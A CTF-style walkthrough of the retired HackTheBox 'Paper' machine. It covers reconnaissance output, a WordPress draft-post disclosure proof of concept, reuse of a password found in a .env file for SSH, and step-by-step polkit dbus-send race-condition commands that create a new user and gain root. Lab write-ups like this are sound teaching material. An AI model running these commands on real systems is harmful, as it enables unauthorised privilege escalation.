Paper WalkThrouge — HackTheBox
Hey, my friends, I’m Adham Makroum aka 0xmkr24, Today I’ll root Paper Box which is retired today, try to simplify it for you and I wish this write-up be useful for you
Nmap
Nmap scan report for office.paper (10.10.11.143)
Host is up (0.0078s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open https?
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Actiontec MI424WR-GEN3I WAP (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (97%), Linux 4.4 (96%), Microsoft Windows XP SP3 (96%), VMware Player virtual NAT device (91%), BlueArc Titan 2100 NAS device (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hopsTRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 0.16 ms 192.168.192.2
2 0.20 ms office.paper (10.10.11.143)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 624.16 seconds
gobuster output was nothing useful so I go to nikto
Nikto
# nikto -host "<http://10.10.11.143/>"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.143
+ Target Hostname: 10.10.11.143
+ Target Port: 80
+ Start Time: 2022-02-15 07:05:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 2 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-02-15 07:10:04 (GMT-5) (293 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- As we can see
x-backend-serveris the uncommon header and it points tooffice.paper
so I added it to the hosts file then opened it in a browser
I noticed there is WordPress with version 5.2.3 so I ran Wpscan
Wpscan
# wpscan --url "<http://office.paper/>" -e vp,dbe,vtbut I didn’t find any vuln plugins or themes
After exploring this page I found this interesting comment
so I google it and found useful result
This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.
Proof of Concept
http://wordpress.local/?static=1
This blog to more understand about this vulnerability → Blog
then I added chat.office.paper to the hosts file
After reading messages in the general channel, I found a bot that can list files from the server but the channel was read-only so I chat with it in private
i tried to get user.txt
After searching in other files i found this
then I got .env
i tried this password to get ssh and it worked
then i got user.txt
Privilege Escalation
This is a time to take full access to this box
i transferred linpease and ran it
after reading the output I noticed this service
then I google it
Polkit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones
it‘s installed by default on many Linux distributions. It’s used by systemd , so any Linux distribution that uses systemd also uses polkit.
I searched how can I get root privileges with it and found this blog
if you don’t need to follow how this vulnerability is exploited step by step then this is poc you can run it and you will be a user with root privileges
As mentioned in the blog we can run this command to measure how long it takes to run the dbus-send
time dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required real 0m0.060s
user 0m0.004s
sys 0m0.002s
make sleep command with half real-time, for me is will be 0.030s
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.030s ; kill $!you need to re enter this command many times until boris user created
Next, you need to set a password for the new account
The D-Bus interface expects a hashed password, which you can create using openssl
$ openssl passwd -5 password $5$5dzEBJ0waB4f606U$vEAZZvZO34Ouw.lszHtkhsT1iyHnZpktRYRiSV/4yB3
Now you just have to do the same trick again, except this time call the SetPassword D-Bus method:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$5dzEBJ0waB4f606U$vEAZZvZO34Ouw.lszHtkhsT1iyHnZpktRYRiSV/4yB3' string:GoldenEye & sleep 0.030s ; kill $!note that you need to paste in the correct user identifier (UID), which is 1005 in my case and edit sleep time as we did before + the password hash from the openssl command.
then
su - boris
# password: password
sudo su
# password: passwordFinally, the Machine is rooted!
